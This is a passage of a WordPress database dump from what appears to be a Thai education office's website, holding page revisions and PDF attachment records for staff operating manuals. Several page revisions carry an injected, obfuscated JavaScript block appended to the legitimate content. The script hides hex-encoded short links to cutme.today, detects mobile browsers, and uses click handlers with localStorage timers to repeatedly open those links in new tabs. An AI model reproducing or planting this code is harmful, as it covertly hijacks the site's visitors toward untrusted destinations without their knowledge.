_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-09 22:08:40','2024-08-09 15:08:40','',14,'http://pakhaeng.ssk.in.th/?p=814',0,'revision','',0),
(815,1,'2024-08-09 22:49:38','2024-08-09 15:49:38','','คู่มือการปฏิบัติงาน','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99','','','2024-08-09 22:49:38','2024-08-09 15:49:38','',784,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf',0,'attachment','application/pdf',0),
(817,1,'2024-08-09 22:50:39','2024-08-09 15:50:39','','คู่มือปฏิบัติงานบุคลกรทางการศึกษา','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%81%e0%b8%a3-2','','','2024-08-09 22:50:39','2024-08-09 15:50:39','',784,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-1.pdf',0,'attachment','application/pdf',0),
(818,1,'2024-08-09 22:53:26','2024-08-09 15:53:26','<!-- wp:file {\"id\":815,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือการปฏิบัติงานของข้าราชการ\"></object><a id=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\">คู่มือการปฏิบัติงานของข้าราชการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:file {\"id\":817,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-1.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-e142cd99-b60b-4389-a1e9-39c269f5c746\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-1.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">คู่มือปฏิบัติงานบุคลากรทางการศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-e142cd99-b60b-4389-a1e9-39c269f5c746\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่','','inherit','closed','closed','','784-revision-v1','','','2024-08-09 22:53:26','2024-08-09 15:53:26','',784,'http://pakhaeng.ssk.in.th/?p=818',0,'revision','',0),
(820,1,'2024-08-09 22:55:57','2024-08-09 15:55:57','','คู่มือปฏิบัติงานบุคลกรทางการศึกษา','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%81%e0%b8%a3-3','','','2024-08-09 22:55:57','2024-08-09 15:55:57','',784,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-2.pdf',0,'attachment','application/pdf',0),
(821,1,'2024-08-09 22:56:10','2024-08-09 15:56:10','<!-- wp:file {\"id\":815,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\",\"displayPreview\":true,\"previewHeight\":1200} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:1200px\" aria-label=\"คู่มือการปฏิบัติงานของเจ้าหน้าที่\"></object><a id=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\">คู่มือการปฏิบัติงานของเจ้าหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":820,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-2.pdf\",\"displayPreview\":true,\"previewHeight\":1200} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-2.pdf\" type=\"application/pdf\" style=\"width:100%;height:1200px\" aria-label=\"คู่มือปฏิบัติงานบุคลกรทางการศึกษา\"></object><a id=\"wp-block-file--media-77ce6f9c-38dd-4b68-b2a1-0d0dfe888f52\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-2.pdf\">คู่มือปฏิบัติงานบุคลกรทางการศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-2.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-77ce6f9c-38dd-4b68-b2a1-0d0dfe888f52\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 